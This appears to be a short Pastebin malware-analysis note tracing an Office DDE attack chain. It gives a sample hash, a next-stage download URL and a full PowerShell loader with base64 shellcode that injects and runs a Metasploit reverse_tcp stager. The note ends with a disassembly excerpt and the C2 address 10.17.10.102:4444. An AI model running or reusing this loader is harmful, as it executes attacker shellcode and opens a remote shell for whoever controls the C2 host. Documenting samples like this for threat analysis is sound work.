sysopfb

officedde to metasploit reverse_tcp

Oct 26th, 2017
268
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
  1. bca020e5711706c0552720d0777f47bc866801a4384cf175375bf9815e54e1c6
  2.  
  3. Downloads:
  4. https://pastebin.com/raw/KqSrZYeT
  5.  
  6. [Byte[]]$xwr = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagpoChEKZmgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8O78LWiVmoAU//V")
  7.  
  8. $iB1q5iM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((jEMbg kernel32.dll VirtualAlloc), (n385EF @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $xwr.Length,0x3000, 0x40)
  9. [System.Runtime.InteropServices.Marshal]::Copy($xwr, 0, $iB1q5iM, $xwr.length)
  10.  
  11. $fSXil = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((jEMbg kernel32.dll CreateThread), (n385EF @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$iB1q5iM,[IntPtr]::Zero,0,[IntPtr]::Zero)
  12. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((jEMbg kernel32.dll WaitForSingleObject), (n385EF @([IntPtr], [Int32]))).Invoke($fSXil,0xffffffff) | Out-Null
  13.  
  14.  
  15.  
  16.  
  17. eventually decodes down to a metasploit reverse_tcp blob
  18.  
  19. 0x000000ad 5 680a110a66 push 0x660a110a
  20. 0x000000b2 5 680200115c push 0x5c110002
  21. 0x000000b7 2 89e6 mov esi, esp
  22. 0x000000b9 1 50 push eax
  23. 0x000000ba 1 50 push eax
  24. 0x000000bb 1 50 push eax
  25. 0x000000bc 1 50 push eax
  26. 0x000000bd 1 40 inc eax
  27. 0x000000be 1 50 push eax
  28. 0x000000bf 1 40 inc eax
  29. 0x000000c0 1 50 push eax
  30. 0x000000c1 5 68ea0fdfe0 push 0xe0df0fea
  31. 0x000000c6 2 ffd5 call ebp
  32. 0x000000c8 1 97 xchg eax, edi
  33. 0x000000c9 2 6a10 push 0x10
  34. 0x000000cb 1 56 push esi
  35. 0x000000cc 1 57 push edi
  36. 0x000000cd 5 6899a57461 push 0x6174a599
  37. 0x000000d2 2 ffd5 call ebp
  38.  
  39.  
  40. C2 internal range
  41. 10.17.10.102:4444
Advertisement
Add Comment
Please, Sign In to add comment